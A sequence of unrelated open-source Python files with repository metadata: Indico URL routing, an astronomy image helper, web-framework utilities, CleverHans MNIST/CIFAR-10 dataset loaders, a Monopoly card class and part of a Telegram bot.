abstract.RHAbstractNotificationLog, defaults=defaults)
# Abstract actions
_bp.add_url_rule(prefix + '/<int:abstract_id>/edit', 'edit_abstract',
abstract.RHEditAbstract, methods=('GET', 'POST'), defaults=defaults)
# Reviewing/judgment actions
_bp.add_url_rule(prefix + '/<int:abstract_id>/withdraw', 'withdraw_abstract',
reviewing.RHWithdrawAbstract, methods=('POST',), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/reset', 'reset_abstract_state',
reviewing.RHResetAbstractState, methods=('POST',), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/judge', 'judge_abstract',
reviewing.RHJudgeAbstract, methods=('POST',), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/reviewing-tracks', 'edit_review_tracks',
reviewing.RHEditReviewedForTrackList, methods=('GET', 'POST'), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/review/track/<int:track_id>', 'review_abstract',
reviewing.RHSubmitAbstractReview, methods=('GET', 'POST'), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/reviews/<int:review_id>/edit', 'edit_review',
reviewing.RHEditAbstractReview, methods=('GET', 'POST'), defaults=defaults)
# Abstract comments
_bp.add_url_rule(prefix + '/<int:abstract_id>/comment', 'comment_abstract',
reviewing.RHSubmitAbstractComment, methods=('POST',), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/comments/<int:comment_id>', 'edit_abstract_comment',
reviewing.RHEditAbstractComment, methods=('GET', 'POST'), defaults=defaults)
_bp.add_url_rule(prefix + '/<int:abstract_id>/comments/<int:comment_id>', 'delete_abstract_comment',
reviewing.RHDeleteAbstractComment, methods=('DELETE',), defaults=defaults)
@_bp.url_defaults
def _add_management_flag(endpoint, values):
if ('management' not in values and
endpoint.split('.')[0] == _bp.name and
current_app.url_map.is_endpoint_expecting(endpoint, 'management')):
values['management'] = g.rh.management
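# url_for() sketch (hypothetical ids, shown only to illustrate the url_defaults
# hook above inside a request handled by this blueprint):
#
#   url_for('abstracts.display_abstract', event_id=1, abstract_id=2)
#   # -> '/event/1/manage/abstracts/2/' when g.rh.management is True
#   # -> '/event/1/abstracts/2/'        when it is False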
# Legacy URLs - display
_compat_bp = IndicoBlueprint('compat_abstracts', __name__, url_prefix='/event/<int:event_id>')
_compat_bp.add_url_rule('/call-for-abstracts/', 'cfa', make_compat_redirect_func(_bp, 'call_for_abstracts'))
_compat_bp.add_url_rule('/call-for-abstracts/my-abstracts', 'mine',
make_compat_redirect_func(_bp, 'call_for_abstracts'))
_compat_bp.add_url_rule('/call-for-abstracts/my-abstracts.pdf', 'mine_pdf',
make_compat_redirect_func(_bp, 'my_abstracts_pdf'))
_compat_bp.add_url_rule('/call-for-abstracts/submit', 'submit', make_compat_redirect_func(_bp, 'call_for_abstracts'))
_compat_bp.add_url_rule('/call-for-abstracts/<int:friendly_id>/', 'abstract',
partial(compat_abstract, 'display_abstract'))
_compat_bp.add_url_rule('/call-for-abstracts/<int:friendly_id>/Abstract.pdf', 'abstract_pdf',
partial(compat_abstract, 'display_abstract_pdf_export'))
_compat_bp.add_url_rule('/abstract-book.pdf', 'boa', make_compat_redirect_func(_bp, 'export_boa'))
# Legacy URLs - management
_compat_bp.add_url_rule('/manage/call-for-abstracts/abstracts/', 'manage_cfa',
make_compat_redirect_func(_bp, 'manage_abstract_list'))
_compat_bp.add_url_rule('/manage/call-for-abstracts/abstracts/<int:friendly_id>/', 'manage_abstract',
partial(compat_abstract, 'display_abstract', management=True))
_compat_bp.add_url_rule('/manage/call-for-abstracts/abstracts/<int:friendly_id>/abstract.pdf',
'manage_abstract_pdf_export', partial(compat_abstract, 'manage_abstract_pdf_export',
management=True))
# Legacy URLs - reviewing
_compat_bp.add_url_rule('/manage/program/tracks/<int:track_id>/abstracts/',
'track_abstracts', make_compat_redirect_func(_bp, 'display_reviewable_tracks',
view_args_conv={'track_id': None}))
_compat_bp.add_url_rule('/manage/program/tracks/<int:track_id>/abstracts/<int:friendly_id>/', 'track_abstract',
partial(compat_abstract, 'display_abstract'))
_compat_bp.add_url_rule('/manage/program/tracks/<int:track_id>/abstracts/<int:friendly_id>/abstract.pdf',
'track_abstract_pdf', partial(compat_abstract, 'display_abstract_pdf_export'))
| {
"content_hash": "97ae3fdf99823a437ec2a83a948fec7f",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 120,
"avg_line_length": 69.78865979381443,
"alnum_prop": 0.6773026072826649,
"repo_name": "indico/indico",
"id": "d7f2fcf39b04c37594608a00dba091f8b2b28d7e",
"size": "13753",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "indico/modules/events/abstracts/blueprint.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "33289"
},
{
"name": "HTML",
"bytes": "1420471"
},
{
"name": "JavaScript",
"bytes": "2362355"
},
{
"name": "Mako",
"bytes": "1527"
},
{
"name": "Python",
"bytes": "5550085"
},
{
"name": "SCSS",
"bytes": "486043"
},
{
"name": "Shell",
"bytes": "3877"
},
{
"name": "TeX",
"bytes": "23435"
},
{
"name": "XSLT",
"bytes": "1504"
}
],
"symlink_target": ""
} |
import os
import astropy.units as u
from astropy.io import fits
import numpy as np
from astropy.cosmology import FlatLambdaCDM
cosmo = FlatLambdaCDM(H0=70, Om0=0.3)
from .operator import Operator
from .. import standards
from ..filters import surveysetup
from ..external_links import file_humvi_compose
from .. import visualtools
class Imager(Operator):
def __init__(self, **kwargs):
"""
Imager, parent class for all obj operator for images
Params
------
Operator params:
/either
obj (object of class obsobj): with attributes ra, dec, dir_obj
/or
ra (float)
dec (float)
/either
dir_obj (string)
/or
dir_parent (string): attr dir_obj is set to dir_parent+'SDSSJXXXX+XXXX/'
survey (str):
survey of the photometric system
if not provided, use self.obj.survey. Raise exception if self.obj.survey does not exist.
z=-1 (float):
			redshift; if not provided, use self.obj.z or self.obj.sdss.z. It does not automatically query sdss to get z. If nothing is specified then it is set to -1.
center_mode='n/2' (str):
			how the image center is defined in case of even n, 'n/2' or 'n/2-1'. Should be set to 'n/2-1' if the image is downloaded from the HSC query.
Attributes
----------
Operator Attributes:
obj (instance of objObj)
ra (float)
dec (float)
dir_obj (string)
survey (str): e.g., 'hsc'
survey of the photometric system
z (float):
redshift
pixsize (astropy angle quantity):
in unit of arcsec
pixelscale (astropy pixscale quantity):
for pixel and arcsec conversion
"""
super(Imager, self).__init__(**kwargs)
# set survey
if hasattr(self.obj, 'survey'):
default_survey = self.obj.survey
self.survey = kwargs.pop('survey', default_survey)
else:
self.survey = kwargs.pop('survey')
# set up obj.survey
if self.survey == 'hsc':
self.obj.add_hsc()
elif self.survey == 'sdss':
self.obj.add_sdss()
# set z
if hasattr(self.obj, 'z'):
self.z = kwargs.pop('z', self.obj.z)
elif hasattr(self.obj, 'sdss'):
self.z = kwargs.pop('z', self.obj.sdss.z)
elif 'z' in kwargs:
self.z = kwargs.pop('z')
else:
print("[imager] not redshift used, assuming -1")
self.z = -1
# set center_mode
self.center_mode = kwargs.pop('center_mode', 'n/2')
# set pixsize
self.pixsize = surveysetup.pixsize[self.survey]
self.pixelscale = u.pixel_scale(self.pixsize/u.pixel)
def get_fp_stamp(self, band):
return self.dir_obj + self.get_fn_stamp(band)
def get_fn_stamp(self, band):
return 'stamp-{0}.fits'.format(band)
def get_fp_psf(self, band):
return self.dir_obj + self.get_fn_psf(band)
def get_fn_psf(self, band):
return 'psf-{0}.fits'.format(band)
def get_fp_stamp_line(self, line):
""" e.g., stamp-OIII5008.fits, for stamp in observed frame in flux """
return self.dir_obj+'stamp-{0}.fits'.format(line)
def get_fp_stamp_line_I(self, line):
""" e.g., stamp-OIII5008_I.fits for stamp in rest frame in intensity"""
return self.dir_obj+'stamp-{0}_I.fits'.format(line)
def get_fp_stamp_img(self, imgtag):
""" e.g., stamp-{imgtag}.fits"""
return self.dir_obj+'stamp-{imgtag}.fits'.format(imgtag=imgtag)
def get_stamp_img(self, imgtag, wunit=False):
""" return the image as numpy array """
fn_img = self.get_fp_stamp_img(imgtag=imgtag)
hdus = fits.open(fn_img)
if wunit:
img = hdus[0].data * u.Unit(hdus[0].header['BUNIT'])
else:
img = hdus[0].data
return img
def _theta_to_pix(self, theta):
""" convert an angular quantity (*u.arcsec) theta to pixel scale (float) """
return (theta.to(u.pix, self.pixelscale)/u.pix).to(u.dimensionless_unscaled)
def _pix_to_theta(self, pix, wunit=True):
""" convert pix (float) to angular quantity (*u.arcsec) """
result = (pix*u.pix).to(u.arcsec, self.pixelscale)
if wunit:
return result
else:
return (result/u.arcsec).to(u.dimensionless_unscaled)
def _theta_to_kpc(self, theta, wunit=True):
result = (theta*self._get_kpc_proper_per_arcsec()).to(u.kpc)
if wunit:
return result
else:
return (result/u.kpc).to(u.dimensionless_unscaled)
def _get_kpc_proper_per_arcsec(self):
return 1./cosmo.arcsec_per_kpc_proper(self.z)
def _get_xc_yc(self, img):
""" return (xc, yc) the coordinate of image center given image, according to self.center_mode """
xc, yc = standards.get_img_xycenter(img, center_mode=self.center_mode)
return xc, yc
def make_colorimg(self, bands ='riz', img_type='stamp', s=[1.0, 1.1, 1.0], p=[1.6, 1.6], overwrite=False):
"""
		make a color composite image using the external package HumVI. Example file name: 'color_stamp-riz.png'.
See Humvi documentation -- https://github.com/drphilmarshall/HumVI
Params
------
bands ='riz'
img_type='stamp'
s=[1.0, 1.1, 1.0]
humvi params for color balance. Default is set to bring out the middle band.
p=[1.6, 1.6]
humvi params Q, alpha
overwrite=False
Return
------
status (bool)
"""
fn = self.dir_obj+'color_{img_type}-{bands}.png'.format(bands=bands, img_type=img_type)
fns_in = [self.dir_obj+img_type+'-'+band+'.fits' for band in bands[::-1]]
# set params, for example, commandparams = ' -s 1.0,1.1,1.0 -p 1.6,1.6 -o '
commandparams = ' -s {} -p {} -o '.format(','.join(np.array(s).astype('str')), ','.join(np.array(p).astype('str')))
if (not os.path.isfile(fn)) or overwrite:
commandfiles = '{0} {1} {2} {3}'.format(fn, fns_in[0], fns_in[1], fns_in[2])
commandHumVI = file_humvi_compose+commandparams+commandfiles
os.system(commandHumVI)
status = os.path.isfile(fn)
return status
def plot_stamp_linemap_I(self, line='OIII5008', overwrite=False, vmin=None, vmax=10.):
"""
plot line map I as png.
Params
------
self
line='OIII5008' (str)
overwrite=False (bool)
Return
------
status (bool)
"""
fn = self.get_fp_stamp_line_I(line=line)
fn_out = os.path.splitext(fn)[0]+'.png'
if not os.path.isfile(fn_out) or overwrite:
print("[decomposer] plotting linemap")
visualtools.fits_to_png(fn_in=fn, fn_out=fn_out, vmin=vmin, vmax=vmax, scaling='arcsinh')
else:
print("[decomposer] skip plotting linemap as files exist")
return os.path.isfile(fn_out)
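# Usage sketch (assumptions: "obj" is an obsobj instance with ra/dec/dir_obj and
# an SDSS/HSC counterpart; z=0.2 is an illustrative redshift):
#
#   img = Imager(obj=obj, survey='hsc', z=0.2)
#   img.make_colorimg(bands='riz', img_type='stamp')    # writes color_stamp-riz.png
#   n_pix = img._theta_to_pix(5. * u.arcsec)             # angular size -> pixels
#   d_kpc = img._theta_to_kpc(5. * u.arcsec)             # angular size -> proper kpc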
| {
"content_hash": "924bfdbf6e673d7976d39b6093d2fa3c",
"timestamp": "",
"source": "github",
"line_count": 237,
"max_line_length": 151,
"avg_line_length": 26.18143459915612,
"alnum_prop": 0.6568896051571314,
"repo_name": "aileisun/bubbleimg",
"id": "7a109c7dba7598ea6b5fc2f3ffe4e4bd891387a8",
"size": "6236",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bubbleimg/obsobj/imager.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "422380"
}
],
"symlink_target": ""
} |
import inspect
import os
import sys
from datetime import datetime, date
import time
import logging
import json
try:
    from collections.abc import Iterable
except ImportError:  # Python 2 fallback
    from collections import Iterable
import copy
from bson.objectid import ObjectId
from turbo.log import util_log
try:
    basestring
except Exception as e:
    # Python 3: map the removed Python 2 names onto str
    basestring = str
    unicode = str
def to_list_str(value, encode=None):
"""recursively convert list content into string
:arg list value: The list that need to be converted.
:arg function encode: Function used to encode object.
"""
result = []
for index, v in enumerate(value):
if isinstance(v, dict):
result.append(to_dict_str(v, encode))
continue
if isinstance(v, list):
result.append(to_list_str(v, encode))
continue
if encode:
result.append(encode(v))
else:
result.append(default_encode(v))
return result
def to_dict_str(origin_value, encode=None):
"""recursively convert dict content into string
"""
value = copy.deepcopy(origin_value)
for k, v in value.items():
if isinstance(v, dict):
value[k] = to_dict_str(v, encode)
continue
if isinstance(v, list):
value[k] = to_list_str(v, encode)
continue
if encode:
value[k] = encode(v)
else:
value[k] = default_encode(v)
return value
def default_encode(v):
"""convert ObjectId, datetime, date into string
"""
if isinstance(v, ObjectId):
return unicode(v)
if isinstance(v, datetime):
return format_time(v)
if isinstance(v, date):
return format_time(v)
return v
def to_str(v, encode=None):
"""convert any list, dict, iterable and primitives object to string
"""
if isinstance(v, basestring):
return v
if isinstance(v, dict):
return to_dict_str(v, encode)
if isinstance(v, Iterable):
return to_list_str(v, encode)
if encode:
return encode(v)
else:
return default_encode(v)
def format_time(dt):
"""datetime format
"""
return time.mktime(dt.timetuple())
def to_objectid(objid):
"""字符对象转换成objectid
"""
if objid is None:
return objid
try:
objid = ObjectId(objid)
except:
util_log.error("%s is invalid objectid" % objid)
return None
return objid
def json_encode(data, **kwargs):
try:
return json.dumps(data, **kwargs)
except Exception as e:
util_log.error("Uncaught exception in json_encode", exc_info=True)
def json_decode(data, **kwargs):
try:
return json.loads(data, **kwargs)
except Exception as e:
util_log.error("Uncaught exception in json_decode", exc_info=True)
def to_int(value, default=None):
    try:
        return int(value)
    except ValueError as e:
        util_log.error(e)
        return default
def to_float(value, default=None):
    try:
        return float(value)
    except ValueError as e:
        util_log.error(e)
        return default
def to_datetime(t, micro=False):
if micro:
return datetime.fromtimestamp(t/1000)
else:
return datetime.fromtimestamp(t)
def to_time(t, micro=False):
if micro:
return time.mktime(t.timetuple())*1000
else:
return time.mktime(t.timetuple())
class Escape(object):
__slots__ = ['to_list_str', 'to_dict_str', 'default_encode', 'format_time', 'to_objectid',
'to_str', 'to_time', 'to_datetime', 'to_int', 'to_float', 'json_decode', 'json_encode', '__gl']
def __init__(self, module):
self.__gl = module
def __getattr__(self, name):
if name in self.__slots__:
return self.__gl.get(name)
raise AttributeError('escape has no attribute %s' % name)
escape = Escape(globals())
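# Usage sketch for the escape proxy above (the ObjectId hex string and the dict
# are illustrative):
#
#   doc = {'_id': ObjectId(), 'created': datetime.now(), 'tags': ['a', 'b']}
#   escape.to_dict_str(doc)     # ObjectId -> string, datetime -> unix timestamp
#   escape.to_objectid('586f6e65000000000000000a')   # str -> ObjectId (or None)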
def get_base_dir(currfile, dir_level_num=3):
"""
find certain path according to currfile
"""
root_path = os.path.abspath(currfile)
for i in range(0, dir_level_num):
root_path = os.path.dirname(root_path)
return root_path
def join_sys_path(currfile, dir_level_num=3):
"""
find certain path then load into sys path
"""
if os.path.isdir(currfile):
root_path = currfile
else:
root_path = get_base_dir(currfile, dir_level_num)
sys.path.append(root_path)
def import_object(name, package_space=None):
if name.count('.') == 0:
return __import__(name, package_space, None)
parts = name.split('.')
obj = __import__('.'.join(parts[:-1]), package_space, None, [str(parts[-1])], 0)
try:
return getattr(obj, parts[-1])
except AttributeError:
raise ImportError("No module named %s" % parts[-1])
def camel_to_underscore(name):
"""
convert CamelCase style to under_score_case
"""
as_list = []
length = len(name)
for index, i in enumerate(name):
        if index != 0 and index != length - 1 and i.isupper():
            as_list.append('_%s' % i.lower())
else:
as_list.append(i.lower())
return ''.join(as_list)
def remove_folder(path, foldername):
if not foldername:
return
if not os.path.isdir(path):
return
dir_content = os.listdir(path)
if not dir_content:
return
for item in dir_content:
child_path = os.path.join(path, item)
if not os.path.isdir(child_path):
continue
if item != foldername:
remove_folder(child_path, foldername)
continue
        # os.rmdir can't delete a non-empty directory, so empty it first
for root, dirs, files in os.walk(child_path, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
try:
os.rmdir(child_path)
except Exception as e:
raise e
def remove_file(path, filename):
if not filename:
return
if not os.path.isdir(path):
return
dir_content = os.listdir(path)
if not dir_content:
return
for item in dir_content:
child_path = os.path.join(path, item)
if os.path.isdir(child_path):
remove_file(child_path, filename)
continue
if item != filename:
continue
try:
os.remove(child_path)
except Exception as e:
raise e
def remove_extension(path, extension):
if not extension:
return
if not os.path.isdir(path):
return
dir_content = os.listdir(path)
if not dir_content:
return
for item in dir_content:
child_path = os.path.join(path, item)
if os.path.isdir(child_path):
remove_extension(child_path, extension)
continue
name, ext = os.path.splitext(item)
if ext != extension:
continue
try:
os.remove(child_path)
except Exception as e:
raise e
def build_index(model_list):
from turbo.model import BaseModel
for m in model_list:
for attr_name in dir(m):
attr = getattr(m, attr_name)
if inspect.isclass(attr) and issubclass(attr, BaseModel) and hasattr(attr, 'name'):
if hasattr(attr, 'index'):
for index in attr.index:
attr().create_index(index, background=True)
else:
print("model %s has no 'index' attribute"%attr.__name__)
| {
"content_hash": "584fb83f3c391137975081c88b90b7c5",
"timestamp": "",
"source": "github",
"line_count": 329,
"max_line_length": 103,
"avg_line_length": 23,
"alnum_prop": 0.5784326681643981,
"repo_name": "tao12345666333/app-turbo",
"id": "a6e14b95ebe750f040b657b65f1ea52713825d2b",
"size": "7605",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "turbo/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1615"
},
{
"name": "JavaScript",
"bytes": "4046"
},
{
"name": "Python",
"bytes": "124548"
}
],
"symlink_target": ""
} |
"""Dataset class for CleverHans
"""
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import array
import functools
import gzip
import operator
import os
import struct
import tempfile
import sys
import warnings
import numpy as np
import tensorflow as tf
try:
from tensorflow.python.keras.utils import np_utils
from tensorflow.keras.datasets import cifar10
except ImportError:
# In tf 1.8, np_utils doesn't seem to be publicly exposed.
# In later tf versions, it is, and in pre-tf keras it was too.
from tensorflow.python.keras import _impl
np_utils = _impl.keras.utils.np_utils
# In tf 1.8, "from tensorflow.keras.datasets import cifar10" doesn't work even though the module exists
cifar10 = tf.keras.datasets.cifar10
warnings.warn(
"Support for TensorFlow versions prior to 1.12 is deprecated."
" CleverHans using earlier versions may quit working on or after 2019-07-07."
)
from cleverhans import utils
class Dataset(object):
"""Abstract base class representing a dataset."""
# The number of classes in the dataset. Should be specified by subclasses.
NB_CLASSES = None
def __init__(self, kwargs=None):
if kwargs is None:
kwargs = {}
if "self" in kwargs:
del kwargs["self"]
self.kwargs = kwargs
def get_factory(self):
"""Returns a picklable callable that recreates the dataset."""
return Factory(type(self), self.kwargs)
def get_set(self, which_set):
"""Returns the training set or test set as an (x_data, y_data) tuple.
:param which_set: 'train' or 'test'
"""
return (getattr(self, "x_" + which_set), getattr(self, "y_" + which_set))
def to_tensorflow(self):
raise NotImplementedError()
@classmethod
def in_memory_dataset(cls, x, y, shuffle=None, repeat=True):
assert x.shape[0] == y.shape[0]
d = tf.data.Dataset.range(x.shape[0])
if repeat:
d = d.repeat()
if shuffle:
d = d.shuffle(shuffle)
def lookup(p):
return x[p], y[p]
d = d.map(lambda i: tf.py_func(lookup, [i], [tf.float32] * 2))
return d
class MNIST(Dataset):
"""The MNIST dataset"""
NB_CLASSES = 10
def __init__(
self,
train_start=0,
train_end=60000,
test_start=0,
test_end=10000,
center=False,
max_val=1.0,
):
kwargs = locals()
if "__class__" in kwargs:
del kwargs["__class__"]
super(MNIST, self).__init__(kwargs)
x_train, y_train, x_test, y_test = data_mnist(
train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end,
)
if center:
x_train = x_train * 2.0 - 1.0
x_test = x_test * 2.0 - 1.0
x_train *= max_val
x_test *= max_val
self.x_train = x_train.astype("float32")
self.y_train = y_train.astype("float32")
self.x_test = x_test.astype("float32")
self.y_test = y_test.astype("float32")
def to_tensorflow(self, shuffle=4096):
return (
self.in_memory_dataset(self.x_train, self.y_train, shuffle),
self.in_memory_dataset(self.x_test, self.y_test, repeat=False),
)
class CIFAR10(Dataset):
"""The CIFAR-10 dataset"""
NB_CLASSES = 10
LABEL_NAMES = [
"airplane",
"automobile",
"bird",
"cat",
"deer",
"dog",
"frog",
"horse",
"ship",
"truck",
]
def __init__(
self,
train_start=0,
train_end=60000,
test_start=0,
test_end=10000,
center=False,
max_val=1.0,
):
kwargs = locals()
if "__class__" in kwargs:
del kwargs["__class__"]
super(CIFAR10, self).__init__(kwargs)
packed = data_cifar10(
train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end,
)
x_train, y_train, x_test, y_test = packed
if center:
x_train = x_train * 2.0 - 1.0
x_test = x_test * 2.0 - 1.0
x_train *= max_val
x_test *= max_val
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.max_val = max_val
def to_tensorflow(self, shuffle=4096):
# This is much more efficient with data augmentation, see tutorials.
return (
self.in_memory_dataset(self.x_train, self.y_train, shuffle),
self.in_memory_dataset(self.x_test, self.y_test, repeat=False),
)
class Factory(object):
"""
A callable that creates an object of the specified type and configuration.
"""
def __init__(self, cls, kwargs):
self.cls = cls
self.kwargs = kwargs
def __call__(self):
"""Returns the created object."""
return self.cls(**self.kwargs)
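# Usage sketch (values are the illustrative defaults; MNIST is downloaded into a
# temp dir on first use):
#
#   mnist = MNIST(train_start=0, train_end=60000)
#   x_train, y_train = mnist.get_set("train")
#   factory = mnist.get_factory()     # picklable; factory() rebuilds the dataset
#   train_ds, test_ds = mnist.to_tensorflow(shuffle=4096)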
def maybe_download_file(url, datadir=None, force=False):
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
if not datadir:
datadir = tempfile.gettempdir()
file_name = url[url.rfind("/") + 1 :]
dest_file = os.path.join(datadir, file_name)
isfile = os.path.isfile(dest_file)
if force or not isfile:
urlretrieve(url, dest_file)
return dest_file
def download_and_parse_mnist_file(file_name, datadir=None, force=False):
url = os.path.join('https://storage.googleapis.com/cvdf-datasets/mnist/', file_name)
file_name = maybe_download_file(url, datadir=datadir, force=force)
# Open the file and unzip it if necessary
if os.path.splitext(file_name)[1] == ".gz":
open_fn = gzip.open
else:
open_fn = open
# Parse the file
with open_fn(file_name, "rb") as file_descriptor:
header = file_descriptor.read(4)
assert len(header) == 4
zeros, data_type, n_dims = struct.unpack(">HBB", header)
assert zeros == 0
hex_to_data_type = {
0x08: "B",
0x09: "b",
0x0B: "h",
0x0C: "i",
0x0D: "f",
0x0E: "d",
}
data_type = hex_to_data_type[data_type]
# data_type unicode to ascii conversion (Python2 fix)
if sys.version_info[0] < 3:
data_type = data_type.encode("ascii", "ignore")
dim_sizes = struct.unpack(">" + "I" * n_dims, file_descriptor.read(4 * n_dims))
data = array.array(data_type, file_descriptor.read())
data.byteswap()
desired_items = functools.reduce(operator.mul, dim_sizes)
assert len(data) == desired_items
return np.array(data).reshape(dim_sizes)
def data_mnist(
datadir=tempfile.gettempdir(),
train_start=0,
train_end=60000,
test_start=0,
test_end=10000,
):
"""
Load and preprocess MNIST dataset
:param datadir: path to folder where data should be stored
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:return: tuple of four arrays containing training data, training labels,
testing data and testing labels.
"""
assert isinstance(train_start, int)
assert isinstance(train_end, int)
assert isinstance(test_start, int)
assert isinstance(test_end, int)
X_train = (
download_and_parse_mnist_file("train-images-idx3-ubyte.gz", datadir=datadir)
/ 255.0
)
Y_train = download_and_parse_mnist_file(
"train-labels-idx1-ubyte.gz", datadir=datadir
)
X_test = (
download_and_parse_mnist_file("t10k-images-idx3-ubyte.gz", datadir=datadir)
/ 255.0
)
Y_test = download_and_parse_mnist_file("t10k-labels-idx1-ubyte.gz", datadir=datadir)
X_train = np.expand_dims(X_train, -1)
X_test = np.expand_dims(X_test, -1)
X_train = X_train[train_start:train_end]
Y_train = Y_train[train_start:train_end]
X_test = X_test[test_start:test_end]
Y_test = Y_test[test_start:test_end]
Y_train = utils.to_categorical(Y_train, nb_classes=10)
Y_test = utils.to_categorical(Y_test, nb_classes=10)
return X_train, Y_train, X_test, Y_test
def data_cifar10(train_start=0, train_end=50000, test_start=0, test_end=10000):
"""
Preprocess CIFAR10 dataset
:return:
"""
# These values are specific to CIFAR10
img_rows = 32
img_cols = 32
nb_classes = 10
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
if tf.keras.backend.image_data_format() == "channels_first":
x_train = x_train.reshape(x_train.shape[0], 3, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 3, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 3)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 3)
x_train = x_train.astype("float32")
x_test = x_test.astype("float32")
x_train /= 255
x_test /= 255
print("x_train shape:", x_train.shape)
print(x_train.shape[0], "train samples")
print(x_test.shape[0], "test samples")
# convert class vectors to binary class matrices
y_train = np_utils.to_categorical(y_train, nb_classes)
y_test = np_utils.to_categorical(y_test, nb_classes)
x_train = x_train[train_start:train_end, :, :, :]
y_train = y_train[train_start:train_end, :]
x_test = x_test[test_start:test_end, :]
y_test = y_test[test_start:test_end, :]
return x_train, y_train, x_test, y_test
| {
"content_hash": "9d6dd508b6e3be9402b0ee9d61e43737",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 107,
"avg_line_length": 28.95100864553314,
"alnum_prop": 0.5932709536133784,
"repo_name": "cleverhans-lab/cleverhans",
"id": "53cdd70a0f74ff352abf0844137f2a6be9a2de18",
"size": "10046",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cleverhans_v3.1.0/cleverhans/dataset.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "242"
},
{
"name": "HTML",
"bytes": "64"
},
{
"name": "Makefile",
"bytes": "836"
},
{
"name": "Python",
"bytes": "1016809"
},
{
"name": "Shell",
"bytes": "2831"
}
],
"symlink_target": ""
} |
from .card import Card
class GoBackThreeSpaces(Card):
'''
Go back three spaces.
'''
def play(self, game, current_player):
# We defer this import to avoid a circular reference...
from ..game import Board
# We move the player back three squares...
current_player.state.square -= 3
if current_player.state.square < 0:
current_player.state.square += Board.NUMBER_OF_SQUARES
game.player_has_changed_square(current_player)
| {
"content_hash": "dae9b3ad90ee8966c60d7d603c945585",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 66,
"avg_line_length": 25,
"alnum_prop": 0.632,
"repo_name": "richard-shepherd/monopyly",
"id": "6048ef71b4f3d0848d8e07efd86dcc76e3c921d0",
"size": "500",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "monopyly/cards/go_back_three_spaces.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "57628"
},
{
"name": "Python",
"bytes": "2136924"
},
{
"name": "Shell",
"bytes": "474"
}
],
"symlink_target": ""
} |
import requests
import time
import sys
import datetime
import csv
import random
import re
import json
import traceback
import os
import telegram
from pydblite import Base #The PyDbLite stuff
import builtins
messagesSent = 0
spamLimitTime = 15
spamArray = {}
def helpResponse():
response = "/goodmorning - say hello\n"
response += "/goodnight - say goodbye\n"
response += "/shotty - settle disputes over who gets to ride shotgun\n"
response += "/snail words - sneeple have infiltrated the government\n"
response += "/fight - Fight someone. Reply to a message to fight whoever wrote it\n"
response += "/objection - reply to a message to object to its contents\n"
response += "/pick Name Name Name - the bot will pick someone or something from the list\n"
response += "/fmk Name or /fmk Name Name Name - the bot will answer your burning questions\n"
response += "/age - learn how long this instance of the bot has been running\n"
response += "/yesorno - let me guide your life choices\n"
response += "/8ball - ask the emojic 8ball a question\n"
response += "/summon Name - summon somebody to your chat\n"
response += "/adlib - learn about this bot's ability to ad lib posts\n"
response += "/more - extra commands"
return response
def moreResponse():
response = "/ping - returns pong\n"
response = "/expand - expands dong\n"
response += "/meme - only the dankest\n"
response += "/john_madden - UUUUUUUUU\n"
response += "/john_cena - THE UNDERTAKER\n"
response += "/gtg - mom\'s here\n"
response += "/yiss or /yiss word - aww yiss\n"
response += "/smash - a catchphrase\n"
response += "/screams - communicate your internal anguish\n"
response += "/essay - fuck\n"
response += "/community - learn about commands other people made, if they wrote about them"
return response
def adlibResponse():
response = "Ad lib commands will be replaced with appropriate words in a response by the bot.\n"
response += "/whodefine Name, Name, Name, ... - define a list to select with /who\n"
response += "/whocoulditbe - display the defined list\n"
response += "/me - use this to insert yourself into a story.\n"
response += "/who - replaced with a person or thing from the /whodefine list; will return [undefined] if none is found.\n"
response += "/noun - replaced with a noun (person, place, or thing)\n"
response += "/verb - replaced with a verb in the present tense\n"
response += "/verbed - replaced with a verb in the past tense\n"
response += "/verbing - replaced with a verb in the present participle (i.e. walking)\n"
response += "/adjective - replaced with an adjective\n"
response += "/adverb - replaced with an adverb\n"
response += "/number - replaced with a number as a word (ie three)\n"
response += "Any of these commands can be given with a capitalized first letter (ie /Noun) to guarantee the first letter of the returned word will be capitalized, or in all caps (ie /VERB) to get a word in all caps.\n"
return response
def spamCheck(chat_id, date):
global spamArray
global spamLimitTime
try:
spamArray[chat_id]['checking'] = True
except Exception:
spamArray[chat_id] = {'checking': True, 'spamTimestamp': 0}
if time.mktime(date.timetuple()) - spamLimitTime > spamArray[chat_id]['spamTimestamp']:
spamArray[chat_id]['spamTimestamp'] = time.mktime(date.timetuple())
return True
else:
return False
